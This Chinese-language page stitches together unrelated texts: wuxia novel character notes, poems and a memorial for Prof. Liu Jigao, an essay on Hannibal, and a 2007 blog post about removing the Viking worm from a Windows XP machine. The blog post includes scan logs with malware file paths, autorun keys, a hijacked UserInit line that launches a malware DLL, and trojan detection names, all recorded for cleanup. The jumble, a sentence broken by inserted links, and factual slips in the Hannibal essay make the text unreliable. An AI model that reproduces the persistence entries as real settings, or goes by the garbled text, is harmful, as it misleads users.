［兽］黄腥子：冯八公所养恶兽……身材高大、通体黄毛的怪物……虽也一身黄毛，但是通体一样长短，根根强韧，不似前见通体柔毛又细又密，行动之间闪动起一身波纹，月光之下闪闪放光，尤其脑后一股长发下垂至肢，飞行起来，临风直立宛如金针，好看非常，身材也较这个矮小一些……乃云南深山中恶兽，力大无穷，能够握石如粉，手擒飞鸟，动作如飞，灵警非常，老贼从小得来，豢养至今，训练多年，对主也颇忠心，只是天性凶暴，残忍好杀，除冯氏父子外，便在冯家多年的死党，也不敢稍微惹它，平日便由冯胜训练，最是服从

［兽］独角凶犀：……共是三只，两只昨夜被人杀死，剩下一只母的，穿山过涧，其疾如飞。

［人］白银拐冯越/冯八公：老村主……避暑纳福之地，高居峰半近顶之处，好些地方均是壁立数十百丈……昔年虽江湖侠盗，性甚好色……御下严厉，令出必行……连子女儿媳全都奉命惟谨，稍有违忤或是暗中议论，被其发现，必受严刑，门下徒党更不必说，又有一身极好武功，表面和气，一脸笑容，谁都当他阎王一般看待……有名的金口阎王令……家法严厉，不论亲疏，犯者无赦……身材高大声如洪钟的红面长须者……貌相英武，身体伟岸，言动之间自然有威，神情口气十分豪爽……老奸巨滑，负有心计……生性多疑

［人］冯胜：白银拐冯八公的长子，年约四旬，眉目神情虽颇英悍

［人］女盗乾坤一枝花项凤：冯胜之妻

［地-峨眉地名］黄牛坂

旧雨楼·还珠楼主《大侠狄龙子》 全文

复旦大学已故教授刘季高赠予还珠楼主的两首诗

赠还珠楼主李寿民

韩潮苏海安足论，李侯意境隘乾坤。
构景只疑造化力，设想突入众妙门。
龙蛇虎豹时出没，风雨云雷恣吐吞。
日草万言不加点，人间又见谪仙人。

再赠

早爱清虚谈，晚悟寂灭道。
太白是前身，饿虎型何肖。
紫府窥秘书，遂发人天奥。
花雨落行间，彩笔霄汉耀。
（以下缺）

附一篇教授学生悼念他的文章，以稍知他的情况

师恩难忘长相忆
日期：2007-03-03 作者：康萍 来源：新民晚报

春节正是家人团圆、喜庆欢聚的时节，而我们敬仰的刘季高先生却在正月初三驾鹤西去，永远地离开了我们，离开了他钟情的古代文学，离开了热爱他的学生。虽说先生因病昏迷已有时日，但噩耗传来，还是令人万分悲痛，难以承受。

拜识先生是在1986年，当时我考取了先生的唐宋文学研究生。一个初夏的下午，我来到了先生那间红木雕花家具、一壁放满二十四史木盒版、散发着淡淡古韵的斗室。那年先生已七十六岁高龄，但精神矍铄，思路明晰。他招收的虽然是唐宋文学研究生，但他的治学却文学史通代皆精，擅于融会文史，研究不为人注意的课题。他的专著《东汉三国时期的谈论》（上海古籍出版社出版），发掘出沉埋1700余年的“谈论”，论证了“谈论”的存在及其发生、发展的原因，议论深刻，对思想史、文学史都有重要的参考价值。《鸿都门学在中古文艺发展的过程》（文汇报1962年4月）一文，则对文学史上语焉不详的鸿都门学作了专论，论述了当时文人地位的变迁、文学作品的地位。先生对桐城派的研究潜心笃志，尤见深博，所编校的《方苞文集》，标点的《方苞集》《惜抱轩文集》，皆功力深厚，足为后学津梁。他的论文集《斗室文史杂著》研究范围上起《诗经》，下及清代的全祖望、方苞，观点精到，启人遐远。先生善诗，长于书法，《斗室诗集》收有他和钱钟书、蒋天枢、赵景深及陈尚君、骆玉明诸先生的唱酬之作，或感怀史事，或抒发情怀，洞微探幽，真诚感人。

先生很早便在上海震旦文理女子学院、大同大学文学院、安徽大学中文系任教，之后在复旦大学中文系任教授和研究生导师，履历丰富，学识渊博，但为人低调，从不汲汲于名利，不轻臧否人物，扎扎实实做学问，认认真真教书，我很庆幸自己有这么一位学问深、人品高的导师。我当时家住先生家的斜对面，时时前去请益。记得研究生复试前，我曾请教怎样抓重点，他只是让我熟读《古文观止》，要我重视基础，打好功底。他给我们上课重点突出，杜诗、李商隐诗、苏词皆着重讲授，但《尚书》、《老子》《论语》《孟子》《资治通鉴》等无不涉及，引导学生于文史哲融通之中去研究唐宋文学。先生对学生要求很严，每隔两周必召学生到他的斗室上课，每隔一阶段必令学生交学习心得。但他对学生又是宽容的，一位学生用当时新的研究方法写毕业论文，先生的治学方法还是比较传统的，但并没有按自己的喜好让学生修改论文，而是积极予以认可。

先生不仅是位良师，还是一位爱学生如子的长者，三年的研究生生活，先生不仅传授给了我们学问和治学方法，也教会了我们做人行事。我还清楚地记得，第一堂课先生讲的是《易经》的“天行健，君子以自强不息”，后来又重点讲了孟子的“仁者爱人”。之后，无论是学习还是工作、生活，我都会想起先生的教诲，以此鞭策自己。工作后，我有段时期身体不好，先生就告诉我他年轻时的健身方法，并特别关照他做医生的大女儿为我找好医生看病。我结婚时，先生怪我为何不预先告诉他，不然他要写诗送我，但后来先生还是用毛笔写了一首诗，送到我的手上。我对先生也特别依恋，每逢年节必备礼到先生宅上请安，如是几近二十年。遗憾的是，前年我去看望先生，先生正在住院，及去年年底再去探院，先生竟已昏迷，遂至未克重聆恩师教诲，令我痛悔不已。

刘先生，让我再一次呼唤您，您的学生会永久想念您。

不败战神缘何失利

　　前段时间看了电影《不败战神》，讲述了迦太基（Carthage）的著名将领汉尼拔的一生。由于迦太基在第一次布匿战争中战败，汉尼拔从小就在其父哈米尔卡·巴尔卡（Hamilcar Barca）的教育下形成了对罗马帝国的仇恨。公元前218年，为了争夺地中海霸权，汉尼拔率军从其父在西班牙建立的基地新迦太基出发，并决定翻越阿尔卑斯山，以避开罗马帝国的主力部队。这支由步兵、骑手和许多大象组成的部队到达阿尔卑斯山顶时发现去路被一块巨石挡住，汉尼拔在这里展示出了他的智慧，他利用巨石膨胀系数低的弱点，先命令士兵用火烧烤，然后用酒浇洒，冷热交替，巨石终于崩裂，让出前进道路。

　　经过6个月的艰苦跋涉，这支军队成功进入罗马帝国境，尽管步兵损失过半、骑手损失了约1/3，战象仅剩一头，仍数度击败罗马军队，打开了包围罗马的通道，罗马岌岌可危……

　　但汉尼拔为什么没能达成宿愿呢？

　　一是因循守旧，没有创新规则。在打开了包围罗马的通道后，汉尼拔认为按照现有规则，战争已经结束了，并没有直取罗马。他可能没有意识到战争规则是人制定的。（也可能是汉尼拔要征服罗马而不是摧毁罗马，也可能是汉尼拔兵力不足：2万余步兵、约1万骑手。）

　　二是通讯保密工作不佳。由于写有行军计划的机密信件被罗马截获，汉尼拔的兄弟哈士多路巴率领、从西班牙过来的支援部队，被罗马军队突袭消灭。

　　三是功高受嫉并被神化。汉尼拔的赫赫战功却功高震主，一方面引起了迦太基元老院的元老位的嫉妒，拒绝给汉尼拔以任何形式的任何支援；另一方面又把汉尼拔视为不败战神，在汉尼拔力主和平时强令他出战，汉尼拔最终在扎玛会战中失利，从此踏上流亡的生涯……

中了Viking,抓到CONFIG.EXE,NTDLL32.dll,webpnt.exe等

endurer 原创
2007-04-05 第1版

昨天刚上班，一位同事说他的电脑反应很慢，让偶去检修。

打开任务管理器，看到IEXPLORE.New之类的，肯定是中标了。

下载pe_xscan扫描了log，重启电脑到带网络连接的安全模式下，使用在线网页分析，发现可疑项：

pe_xscan 07-03-17 by Purple Endurer
2007-4-4 8:26:38
Windows XP Service Pack 2(5.1.2600)
管理员用户组

[System Process] * 0
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\WINDOWS\system32\winlogon.exe * 548 2004-8-17 12:0:0 Microsoft(R) Windows(R) Operating System 5.1.2600.2180 Windows NT Logon Application (C) Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? winlogon WINLOGON.EXE
C:\WINDOWS\system32\C01B1EF6.DLL 2007-4-4 8:8:8 Microsoft(R) Windows(R) Operating System ? ? (C) Microsoft Corporation. All rights reserved. ? Microsoft Corporation ? ? ?
C:\WINDOWS\system32\FF7A0ADE.DLL 2007-4-4 8:8:8 Microsoft(R) Windows(R) Operating System ? ? (C) Microsoft Corporation. All rights reserved. ? Microsoft Corporation ? ? ?
C:\Program Files\Rising\Rav\CCenter.exe * 872 2006-8-16 17:12:22 Rising Antivirus Software 18, 0, 0, 3 CCenter Copyright Rising 2002 18, 0, 0, 3 Beijing Rising Technology Co., Ltd. Beijing Rising Technology Co., Ltd. CCenter.exe
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\WINDOWS\System32\svchost.exe * 888 2004-8-17 12:0:0 Microsoft? Windows? Operating System 5.1.2600.2180 Generic Host Process for Win32 Services ? Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? svchost.exe svchost.exe
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
Explorer.EXE * 1312
C:\program files\internet explorer\iexplore.exe * 1612 2004-8-17 20:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Internet Explorer (C) Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? iexplore IEXPLORE.EXE
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\WINDOWS\system32\mcdsrv32_070402.dll 2007-4-4 8:8:0
C:\WINDOWS\system32\AlxTB1.dll 2006-10-31 8:7:44 AlxTB Module 1, 0, 0, 1 AlxTB Module Copyright 2000-2003 7, 2, 0, 2 Alexa Internet ? AlxTB AlxTB.DLL
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\CONFIG.EXE * 1908 2007-3-30 8:29:24
C:\Program Files\Common Files\Microsoft Shared\MSINFO\system.2dt * 2000 2007-3-29 16:19:30
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\system2.jmp * 2024 2007-3-29 16:24:50
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.ime * 2044 2007-3-30 11:52:22
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.New * 192 2007-3-30 14:50:18
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\WINDOWS\system32\B4C050A.exe * 220 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\WINDOWS\system32\D97A73FB.exe * 224 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.jmp * 248 2007-3-30 14:50:18
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\WINDOWS\SOUNDMAN.EXE * 420 2006-3-2 16:22:4 Realtek Sound Manager 5, 1, 0, 52 Realtek Sound Manager Copyright (c) 2001-2004 Realtek Semiconductor Corp. 5, 1, 0, 52 Realtek Semiconductor Corp. ALSMTray ALSMTray.exe
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Rising\Rav\RavTask.exe * 488 2006-8-16 17:12:22 Rising Antivirus Software 18, 0, 0, 22 RavTimer Copyright (c) 1998-2006 Rising Corp. 18, 0, 0, 22 Beijing Rising Technology Co., Ltd. Beijing Rising Technology Co., Ltd. RavTimer.exe
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Tencent\QQLive\MiniQQLive.exe * 520 2007-3-1 15:18:44 RTX 3,5,200,2281 QQLive 3,5,200,2281 Tencent MiniQQLive
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Common Files\Real\Update_OB\realsched.exe * 744 2006-12-9 18:9:44 RealPlayer (32-bit) 0.1.0.3512 RealNetworks Scheduler Copyright ? RealNetworks, Inc. 1995-2004 0.1.0.3512 RealNetworks, Inc. RealAudio(tm) is a trademark of RealNetworks, Inc. schedapp realsched.exe
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
c:\windows\system32\webpnt.exe * 1072 2007-4-2 14:45:8 Microsoft Web Printer 5.2600.2180 Microsoft Web Printer C) Microsoft Corporation. All rights reserved. 5.2600.2180 Microsoft Corporation ? WEBPNT WEBPNT.EXE
c:\windows\system32\webpnt.exe 2007-4-2 14:45:8 Microsoft Web Printer 5.2600.2180 Microsoft Web Printer C) Microsoft Corporation. All rights reserved. 5.2600.2180 Microsoft Corporation ? WEBPNT WEBPNT.EXE
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\WINDOWS\system32\ctfmon.exe * 1164 2004-8-17 12:0:0 Microsoft? Windows? Operating System 5.1.2600.2180 CTF Loader ? Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? CTFMON CTFMON.EXE
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\WINDOWS\system32\conime.exe * 1216 2004-8-17 12:0:0 Microsoft? Windows? Operating System 5.1.2600.2180 Console IME ? Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? Console CONIME.EXE
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\program files\Internet Explorer\IEXPLORE.EXE * 2236 2004-8-17 20:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Internet Explorer (C) Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? iexplore IEXPLORE.EXE
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\WINDOWS\system32\AlxTB1.dll 2006-10-31 8:7:44 AlxTB Module 1, 0, 0, 1 AlxTB Module Copyright 2000-2003 7, 2, 0, 2 Alexa Internet ? AlxTB AlxTB.DLL
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Common Files\Microsoft Shared\MSINFO\system.2dt * 2840 2007-3-29 16:19:30
C:\Program Files\Common Files\Microsoft Shared\MSINFO\system.2dt 2007-3-29 16:19:30
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\system2.jmp * 2860 2007-3-29 16:24:50
C:\Program Files\Internet Explorer\PLUGINS\system2.jmp 2007-3-29 16:24:50
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.ime * 2880 2007-3-30 11:52:22
C:\Program Files\Internet Explorer\IEXPLORE.ime 2007-3-30 11:52:22
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.New * 2904 2007-3-30 14:50:18
C:\Program Files\Internet Explorer\IEXPLORE.New 2007-3-30 14:50:18
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.jmp * 2924 2007-3-30 14:50:18
C:\Program Files\Internet Explorer\IEXPLORE.jmp 2007-3-30 14:50:18
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\WINDOWS\system32\dllcache\ykwcs.exe * 2824 2007-4-4 8:9:48
C:\WINDOWS\system32\svchost.exe * 2932 2004-8-17 12:0:0 Microsoft? Windows? Operating System 5.1.2600.2180 Generic Host Process for Win32 Services ? Microsoft Corporation. All rights reserved. 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? svchost.exe svchost.exe
C:\Program Files\Internet Explorer\IEXPLORE.Dat 2007-4-4 8:8:10
C:\Program Files\Internet Explorer\IEXPLORE.win 2007-4-4 8:8:8
C:\Program Files\Internet Explorer\IEXPLORE.Sys 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys 2007-4-4 8:8:6
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-4 8:8:6
C:\Program Files\Internet Explorer\IEXPLORE.EXE * 652 2004-8-17 20:0:0 Microsoft(R) Windows(R) Operating System 6.00.2900.2180 Internet Explorer (C) Microsoft Corporation. All rights reserved. 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) Microsoft Corporation ? iexplore IEXPLORE.EXE
C:\WINDOWS\system32\AlxTB1.dll 2006-10-31 8:7:44 AlxTB Module 1, 0, 0, 1 AlxTB Module Copyright 2000-2003 7, 2, 0, 2 Alexa Internet ? AlxTB AlxTB.DLL
iexplore.exe * 3096
iexplore.exe * 3540
SVCHOSI.exe * 3828

F2 - REG: system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rundll32.exe C:\WINDOWS\system32\mcdsrv16_070402.dll start

O1 - Hosts: 127.0.0.1 locator.metadata.windowsmedia.com
O1 - Hosts: 127.0.0.1 onlinestore.smgbb.cn

O2 - BHO Advance Helper - {8E25AC4A-B129-451B-BEE2-3B510BB751DA} - C:\WINDOWS\system32\NTDLL32.dll
O2 - BHO IE Browser Helper - {D0903A3B-F0EA-434a-9742-98C5335C7946} - C:\WINDOWS\system32\IEHelper.dll
O2 - BHO AlxTB BHO Class - {F1FABE79-25FC-46de-8C5A-2C6DB9D64333} - C:\WINDOWS\system32\AlxTB1.dll

O4 - HKCR\..\Run: [msr1e4er6] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\servicer.exe
O4 - HKCR\..\Run: [w48jmh4480mz] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlog0n.exe
O4 - HKCR\..\Run: [h4rr1] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\c0nime.exe
O4 - HKCR\..\Run: [kgs7kj4zt] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cftmon.exe
O4 - HKCR\..\Run: [9erjfccm] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iexpl0re.exe
O4 - HKCR\..\Run: [sz] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Servere.exe
O4 - HKCR\..\Run: [hc1m1h305f7] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\crasos.exe
O4 - HKCR\..\Run: [zkeczl5mjug1] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rundl132.exe
O4 - HKCR\..\Run: [svc] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\byetmr.exe
O4 - HKCR\..\Run: [System Boot Check] C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\CVQ5OL86\qq[1].exe
O4 - HKLM\..\Run: [NMGameX_AutoRun] C:\WINDOWS\system32\Rundll32.exe NMGameX.dll,LiveProcess /aa
O4 - HKLM\..\Run: [cmdbcs] C:\WINDOWS\cmdbcs.exe
O4 - HKLM\..\Run: [SVCHOSI] C:\Program Files\Internet Explorer\SVCHOSI.exe
O4 - HKLM\..\Run: [Windows Media Player] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Windows Media Player.exe

O8 - IE右键菜单附加项 : Alexa Web Search - http://client.alexa.com/holiday/scrīpt/actions/search.htm
O8 - IE右键菜单附加项 : Get Alexa Data - http://client.alexa.com/holiday/scrīpt/actions/sitedata.htm
O8 - IE右键菜单附加项 : Mail to a Friend... - http://client.alexa.com/holiday/scrīpt/actions/mailto.htm
O8 - IE右键菜单附加项 : See Related Links - http://client.alexa.com/holiday/scrīpt/actions/related.htm
O8 - IE右键菜单附加项 : Write a Review... - http://client.alexa.com/holiday/scrīpt/actions/review.htm

O9 - IE工具栏扩展按钮HKCR：雨林木风 - {06A70D58-8D40-49DD-B46B-DC00AA3ADCA4} - http://www.ylmf.com
O9 - IE工具菜单扩展项HKCR： - {06A70D58-8D40-49DD-B46B-DC00AA3ADCA4} - http://www.ylmf.com

O20 - AppInit_DLLs: C:\WINDOWS\system32\NTDLL32.dll

O23 - 服务: C01B1EF6 (C01B1EF6) - C:\WINDOWS\system32\C01B1EF6.EXE -service 2007-3-30 15:12:26 Microsoft(R) Windows(R) Operating System ? ? (C) Microsoft Corporation. All rights reserved. ? Microsoft Corporation ? ? ?(自动)

O23 - 服务: FF7A0ADE (FF7A0ADE) - C:\WINDOWS\system32\FF7A0ADE.EXE -service 2007-4-4 8:27:8 Microsoft(R) Windows(R) Operating System ? ? (C) Microsoft Corporation. All rights reserved. ? Microsoft Corporation ? ? ?(自动)

O23 - 服务: JRAID () - System32\Drivers\JRAID.SYS JMicron JR036X RAID Driver 5.1.2600.1040 JMicron JR036X RAID Driver Copyright (C) JMicron Technology Corp. 2005-2006 5.1.2600.1040 built by: WinDDK JMicron Technology Corp. ? JRAID.SYS 1.04.04 JRAID.SYS(引导)

O23 - 服务: mv614x () - System32\Drivers\mv614x.sys(引导)

O23 - 服务: NPF (Netgroup Packet Filter) - system32\DRIVERS\npf.sys WinPcap Netgroup Packet Filter Driver 3, 1, 0, 27 npf Copyright ? 2005 CACE Technologies. Copyright ? 2003-2005 NetGroup, Politecnico di Torino. 3, 1, 0, 27 CACE Technologies NPF + TME npf.sys(手动)

O23 - 服务: TomDemoService (TomDemoService) - C:\CONFIG.EXE 2007-3-30 8:29:24(自动)

O23 - 服务: vmscsi () - System32\Drivers\vmscsi.sys VMware, Inc. scrīpt1 Application 1, 2, 0, 0 VMware SCSI Controller Copyright ? 1998-2003 VMware, Inc. 1, 2, 0, 0 VMware, Inc. vmscsi.sys vmscsi.sys(引导)

O23 - 服务: WebPrint (WebPrint) - c:\windows\system32\webprint.exe 2007-4-2 14:45:8 Microsoft Web Printer 5.2600.2180 Microsoft Web Printer C) Microsoft Corporation. All rights reserved. 5.2600.2180 Microsoft Corporation ? WEBPNT WEBPNT.EXE(自动)

O23 - 服务: Windows Firewall (Windows Firewall) - C:\WINDOWS\system32\SVCH0ST.EXE 2007-3-30 16:18:30(自动)

O23 - 服务: wuauserv (Automatic Updates) - C:\WINDOWS\system32\drivers\svchost.exe 2007-4-4 8:9:48(自动)

O24 - [] - {A6011F8F-A7F8-49AA-9ADA-49127D43138F} = C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk
O24 - [] - {754FB7D8-B8FE-4810-B363-A788CD060F1F} = C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys
O24 - [] - {99F1D023-7CEB-4586-80F7-BB1A98DB7602} = C:\Program Files\Internet Explorer\IEXPLORE.Sys
O24 - [] - {923509F1-45CB-4EC0-BDE0-1DED35B8FD60} = C:\Program Files\Internet Explorer\IEXPLORE.win
O24 - [] - {FEB94F5A-69F3-4645-8C2B-9E71D270AF2E} = C:\Program Files\Internet Explorer\IEXPLORE.Dat

这台电脑中的瑞星还是2006的，已经无法升级了。

有一些项目与

昨天才提醒，今天就有网友点击QQ信息中的网址，中Worm.Viking.pk/Worm.Win32.Viking.jg了
http://endurer.bokee.com/6174316.html
http://blog.sina.com.cn/u/49926d910100080b
http://blog.csdn.net/Purpleendurer/archive/2007/03/20/1535711.aspx

相似。

到江民网站下载了Viking专杀工具传给网友查杀，果然清除了一些。

再用瑞星在线免费查毒，又查出一堆：
2007-4-4 10:45:7　瑞星杀毒助手
Windows XP Service Pack 2(5.1.2600)
文件名 病毒名
C:\WINDOWS\system32\cmdbcs.dll Trojan.PSW.OnlineGames.aao
C:\WINDOWS\system32\C01B1EF6.EXE Trojan.IMMSG.TBMSG.df
C:\WINDOWS\system32\C01B1EF6T.EXE Trojan.IMMSG.TBMSG.df
C:\WINDOWS\system32\C01B1EF6.DLL Trojan.IMMSG.TBMSG.df
C:\WINDOWS\system32\D97A73FB.exe Trojan.DL.Agent.mry
C:\WINDOWS\system32\FF7A0ADE.EXE Trojan.IMMSG.TBMSG.dh
C:\WINDOWS\system32\FF7A0ADET.EXE Trojan.IMMSG.TBMSG.dh
C:\WINDOWS\system32\FF7A0ADE.DLL Trojan.IMMSG.Tbmsg.dg
C:\WINDOWS\system32\B4C050A.exe Trojan.IMMSG.TBMSG.dh
C:\WINDOWS\system32\kdjs1.exe>>upack0.36 Trojan.Clicker.PopHot.cq
